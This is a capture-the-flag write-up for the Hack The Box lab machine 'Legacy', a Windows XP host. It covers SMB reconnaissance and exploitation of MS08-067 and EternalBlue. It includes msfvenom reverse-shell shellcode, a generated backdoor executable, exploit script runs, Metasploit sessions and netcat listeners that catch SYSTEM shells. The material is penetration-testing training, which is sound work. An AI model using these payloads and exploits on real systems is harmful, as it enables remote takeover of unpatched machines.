HTB - Legacy
The given box Legacy is a Windows machine with an IP address of 10.10.10.4
Recon
Nmap scan result
On performing a nmap scan on the target, we can see there are 2 standard ports open
1. netbios-ssn - 139
2. smb - 445
And also it discovered that the machine is running Windows XP OS
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ sudo nmap -sC -sV -A 10.10.10.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-14 22:21 IST
Nmap scan report for 10.10.10.4
Host is up (0.35s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|2008 (92%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (92%), Microsoft Windows XP SP2 or Windows Small Business Server 2003 (91%), Microsoft Windows XP SP2 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (90%), Microsoft Windows 2000 Server (89%), Microsoft Windows 2000 SP4 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -4h23m42s, deviation: 2h07m16s, median: -5h53m42s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:f0:fc (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2021-09-14T16:58:33+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 398.97 ms 10.10.14.1
2 399.14 ms 10.10.10.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.48 seconds
So we are going to purely enumerate on SMB service to find our way in
Enumeration
SMB enumeration with enum4linux
enum4linux is a popular script used to enumerate SMB shares
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ enum4linux 10.10.10.4 1 ⨯
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Sep 14 22:26:09 2021
==========================
| Target Information |
==========================
Target ........... 10.10.10.4
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==================================================
| Enumerating Workgroup/Domain on 10.10.10.4 |
==================================================
[+] Got domain/workgroup name: HTB
==========================================
| Nbtstat Information for 10.10.10.4 |
==========================================
Looking up status of 10.10.10.4
LEGACY <00> - B <ACTIVE> Workstation Service
HTB <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
LEGACY <20> - B <ACTIVE> File Server Service
HTB <1e> - <GROUP> B <ACTIVE> Browser Service Elections
HTB <1d> - B <ACTIVE> Master Browser
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
MAC Address = 00-50-56-B9-F0-FC
===================================
| Session Check on 10.10.10.4 |
===================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
We didn’t get any useful information from this result
Nmap script scanning
Since we are searching our way through SMB, it is recommended to scan the service with nmap scripts to find any vulnerabilities for the specific version
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ ls /usr/share/nmap/scripts | grep smb-vuln
smb-vuln-conficker.nse
smb-vuln-cve2009-3103.nse
smb-vuln-cve-2017-7494.nse
smb-vuln-ms06-025.nse
smb-vuln-ms07-029.nse
smb-vuln-ms08-067.nse
smb-vuln-ms10-054.nse
smb-vuln-ms10-061.nse
smb-vuln-ms17-010.nse
smb-vuln-regsvc-dos.nse
smb-vuln-webexec.nse
These are the possible vulnerabilities that can be used on SMB
Lets try to scan the machine with these NSE scripts,
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ sudo nmap --script smb-vuln* -p 445 -A 10.10.10.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-14 22:50 IST
Nmap scan report for 10.10.10.4
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003 (90%)
OS CPE: cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003
Aggressive OS guesses: Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (90%), Microsoft Windows XP SP2 or Windows Small Business Server 2003 (90%), Microsoft Windows XP SP2 (89%), Microsoft Windows XP SP2 or SP3 (88%), Microsoft Windows Server 2003 (87%), Microsoft Windows XP SP3 (87%), Microsoft Windows 2000 SP4 (86%), Microsoft Windows XP Professional SP2 (86%), Microsoft Windows XP Professional SP3 (86%), Microsoft Windows 2000 SP1 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 241.64 ms 10.10.14.1
2 243.01 ms 10.10.10.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.34 seconds
So we have got two vulnerabilities on the machine, smb-vuln-ms08-067 and smb-vuln-ms17-010
Finding suitable exploits from searchsploit
We know that we can use smb-vuln-ms08-067 and smb-vuln-ms17-010 vulnerabilities to exploit our machine
Lets find suitable exploits for these vulnerabilities using searchsploit
Exploits for MS08-067
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ searchsploit ms08-067
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067) | windows/remote/40279.py
Microsoft Windows Server - Code Execution (MS08-067) | windows/remote/7104.c
Microsoft Windows Server - Code Execution (PoC) (MS08-067) | windows/dos/6824.txt
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit) | windows/remote/16362.rb
Microsoft Windows Server - Universal Code Execution (MS08-067) | windows/remote/6841.txt
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067) | windows/remote/7132.py
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We are targetting on Windows XP and we need a RCE
So lets choose Microsoft Windows - 'NetAPI32.dll' Code Execution exploit for smb-vuln-ms08-067 vulnerability, which can be done manually and also with metasploit
Exploits for MS17-010
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ searchsploit ms17-010
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) | windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/41987.py
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We can use manual exploits and metasploit exploit for this smb-vuln-ms17-010 vulnerability
But we are targetting it on Windows XP, most of the exploits from searchsploit are favoured for Windows 7
For exploiting Eternal Blue in Windows XP, I would suggest you take a look on this blog
Gaining Access
MS08-067 manual exploit
Lets copy our ms08-067 exploit to our working directory,
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Legacy]
└─$ searchsploit -m windows/remote/40279.py
Exploit: Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)
URL: https://www.exploit-db.com/exploits/40279
Path: /usr/share/exploitdb/exploits/windows/remote/40279.py
File Type: Python script, ASCII text executable, with very long lines
Copied to: /home/aidenpearce369/HTB/Legacy/40279.py
When we try to run it, we need to make sure that we have the right dependencies
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Legacy]
└─$ python2 40279.py
Install the following library to make this script work
Impacket : http://oss.coresecurity.com/projects/impacket.html
PyCrypto : http://www.amk.ca/python/code/crypto.html
This code has some indentation issues, so I modified it and renamed it
After installing Impacket and PyCrypto,
Lets generate our shellcode through msfvenom, which should be placed in our exploit code to trigger the reverse shell
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1488 bytes
unsigned char buf[] =
"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xf0\x85\x92\xbb\x83\xee\xfc\xe2\xf4\x0c\x6d\x10\xbb\xf0\x85"
"\xf2\x32\x15\xb4\x52\xdf\x7b\xd5\xa2\x30\xa2\x89\x19\xe9\xe4"
"\x0e\xe0\x93\xff\x32\xd8\x9d\xc1\x7a\x3e\x87\x91\xf9\x90\x97"
"\xd0\x44\x5d\xb6\xf1\x42\x70\x49\xa2\xd2\x19\xe9\xe0\x0e\xd8"
"\x87\x7b\xc9\x83\xc3\x13\xcd\x93\x6a\xa1\x0e\xcb\x9b\xf1\x56"
"\x19\xf2\xe8\x66\xa8\xf2\x7b\xb1\x19\xba\x26\xb4\x6d\x17\x31"
"\x4a\x9f\xba\x37\xbd\x72\xce\x06\x86\xef\x43\xcb\xf8\xb6\xce"
"\x14\xdd\x19\xe3\xd4\x84\x41\xdd\x7b\x89\xd9\x30\xa8\x99\x93"
"\x68\x7b\x81\x19\xba\x20\x0c\xd6\x9f\xd4\xde\xc9\xda\xa9\xdf"
"\xc3\x44\x10\xda\xcd\xe1\x7b\x97\x79\x36\xad\xed\xa1\x89\xf0"
"\x85\xfa\xcc\x83\xb7\xcd\xef\x98\xc9\xe5\x9d\xf7\x7a\x47\x03"
"\x60\x84\x92\xbb\xd9\x41\xc6\xeb\x98\xac\x12\xd0\xf0\x7a\x47"
"\xeb\xa0\xd5\xc2\xfb\xa0\xc5\xc2\xd3\x1a\x8a\x4d\x5b\x0f\x50"
"\x05\xd1\xf5\xed\x98\xb1\xfe\x8d\xfa\xb9\xf0\x84\x29\x32\x16"
"\xef\x82\xed\xa7\xed\x0b\x1e\x84\xe4\x6d\x6e\x75\x45\xe6\xb7"
"\x0f\xcb\x9a\xce\x1c\xed\x62\x0e\x52\xd3\x6d\x6e\x98\xe6\xff"
"\xdf\xf0\x0c\x71\xec\xa7\xd2\xa3\x4d\x9a\x97\xcb\xed\x12\x78"
"\xf4\x7c\xb4\xa1\xae\xba\xf1\x08\xd6\x9f\xe0\x43\x92\xff\xa4"
"\xd5\xc4\xed\xa6\xc3\xc4\xf5\xa6\xd3\xc1\xed\x98\xfc\x5e\x84"
"\x76\x7a\x47\x32\x10\xcb\xc4\xfd\x0f\xb5\xfa\xb3\x77\x98\xf2"
"\x44\x25\x3e\x72\xa6\xda\x8f\xfa\x1d\x65\x38\x0f\x44\x25\xb9"
"\x94\xc7\xfa\x05\x69\x5b\x85\x80\x29\xfc\xe3\xf7\xfd\xd1\xf0"
"\xd6\x6d\x6e";
After pasting our shellcode in the exploit file, lets try running it
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Legacy]
└─$ python2 ms08-067.py 10.10.10.4 6 445
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer
# - Added support for selecting a target port at the command line.
# - Changed library calls to allow for establishing a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode.
#######################################################################
$ This version requires the Python Impacket library version to 0_9_17 or newer.
$
$ Here's how to upgrade if necessary:
$
$ git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$ cd impacket
$ pip install .
#######################################################################
Windows XP SP3 English (NX)
[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish
We choose option 6 because we are running it on Windows XP SP3 English (NX)
After completion of our exploit, we will get our reverse shell on netcat listener
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.4] 1028
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd
cd
C:\WINDOWS\system32
While using shell on Windows XP try to remember that we cannot use some useful commands like other Windows OS
MS08-067 metasploit exploit
Lets try to use metasploit exploit for ms08-067,
We can just simply run our exploit by configuring our remote and listener IP
msf6 > search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.88 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.14.8
LHOST => 10.10.14.8
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 10.10.14.8:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:Unknown
[*] 10.10.10.4:445 - We could not detect the language pack, defaulting to English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.4:1028) at 2021-09-15 10:07:23 +0530
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getpid
Current pid: 996
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeUndockPrivilege
meterpreter >
MS17-010 manual exploit
This repo is the best when it comes to exploiting Eternal Blue
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Legacy/MS17-010]
└─$ python send_and_execute.py
send_and_execute.py <ip> <executable_file> [port] [pipe_name]
This exploit script send_and_execute.py sends our own executable to tha target machine and runs it through Eternal Blue
Lets make our own malicious executable (Backdoor/Reverse Shell)
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=9876 EXITFUNC=thread -f exe -a x86 --platform windows -o backdoor.exe
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: backdoor.exe
Now lets run our exploit,
┌──(aidenpearce369㉿aidenpearce369)-[~/HTB/Legacy/MS17-010]
└─$ python send_and_execute.py 10.10.10.4 /home/aidenpearce369/backdoor.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x821dfc18
SESSION: 0xe17cec88
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1bdbb10
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1bdbbb0
overwriting token UserAndGroups
Sending file 6EIB4H.exe...
Opening SVCManager on 10.10.10.4.....
Creating service PSKo.....
Starting service PSKo.....
The NETBIOS connection with the remote host timed out.
Removing service PSKo.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done
After running our exploit, a reverse shell will be spawned in our netcat listener
┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.4] 1029
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd
cd
C:\WINDOWS\system32
C:\WINDOWS\system32>cd ..
cd ..
C:\WINDOWS>cd ..
cd ..
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\
15/09/2021 05:03 �� 73.802 6EIB4H.exe
16/03/2017 08:30 �� 0 AUTOEXEC.BAT
16/03/2017 08:30 �� 0 CONFIG.SYS
16/03/2017 09:07 �� <DIR> Documents and Settings
16/03/2017 08:33 �� <DIR> Program Files
16/03/2017 08:33 �� <DIR> WINDOWS
3 File(s) 73.802 bytes
3 Dir(s) 6.472.749.056 bytes free
...
C:\Documents and Settings\john\Desktop>more user.txt
more user.txt
<---USER FLAG--->
C:\Documents and Settings\Administrator\Desktop>more root.txt
more root.txt
<---ROOT FLAG--->
MS17-010 metasploit exploit
Lets try using our metasploit exploit for smb-ms17-010,
It is famously known as Eternal Blue
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windo
ws 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7
, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows
Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.88 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.8
LHOST => 10.10.14.8
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.14.8:4444
[*] 10.10.10.4:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1
[*] 10.10.10.4:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.4:445 - The target is vulnerable.
[*] 10.10.10.4:445 - Connecting to target for exploitation.
[+] 10.10.10.4:445 - Connection established for exploitation.
[+] 10.10.10.4:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.4:445 - CORE raw buffer dump (11 bytes)
[*] 10.10.10.4:445 - 0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 Windows 5.1
[+] 10.10.10.4:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.4:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.4:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.4:445 - Starting non-paged pool grooming
[+] 10.10.10.4:445 - Sending SMBv2 buffers
[+] 10.10.10.4:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.4:445 - Sending final SMBv2 buffers.
[*] 10.10.10.4:445 - Sending last fragment of exploit packet!
[*] 10.10.10.4:445 - Receiving response from exploit packet
[+] 10.10.10.4:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.4:445 - Sending egg to corrupted connection.
[*] 10.10.10.4:445 - Triggering free of corrupted buffer.
[-] 10.10.10.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.4:445 - Connecting to target for exploitation.
[+] 10.10.10.4:445 - Connection established for exploitation.
[+] 10.10.10.4:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.4:445 - CORE raw buffer dump (11 bytes)
[*] 10.10.10.4:445 - 0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 Windows 5.1
[+] 10.10.10.4:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.4:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.10.4:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.4:445 - Starting non-paged pool grooming
[+] 10.10.10.4:445 - Sending SMBv2 buffers
[+] 10.10.10.4:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.4:445 - Sending final SMBv2 buffers.
[*] 10.10.10.4:445 - Sending last fragment of exploit packet!
[*] 10.10.10.4:445 - Receiving response from exploit packet
[+] 10.10.10.4:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.4:445 - Sending egg to corrupted connection.
[*] 10.10.10.4:445 - Triggering free of corrupted buffer.
[-] 10.10.10.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.4:445 - Connecting to target for exploitation.
[+] 10.10.10.4:445 - Connection established for exploitation.
[+] 10.10.10.4:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.4:445 - CORE raw buffer dump (11 bytes)
[*] 10.10.10.4:445 - 0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 Windows 5.1
[+] 10.10.10.4:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.4:445 - Trying exploit with 22 Groom Allocations.
[*] 10.10.10.4:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.4:445 - Starting non-paged pool grooming
[+] 10.10.10.4:445 - Sending SMBv2 buffers
[+] 10.10.10.4:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.4:445 - Sending final SMBv2 buffers.
[*] 10.10.10.4:445 - Sending last fragment of exploit packet!
[*] 10.10.10.4:445 - Receiving response from exploit packet
[-] 10.10.10.4:445 - Errno::ECONNRESET: Connection reset by peer
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) >
As previously discussed these exploits are mostly favoured for Windows 7 and others and it doesn’t work on Windows XP
That’s why we didn’t get any session for our exploit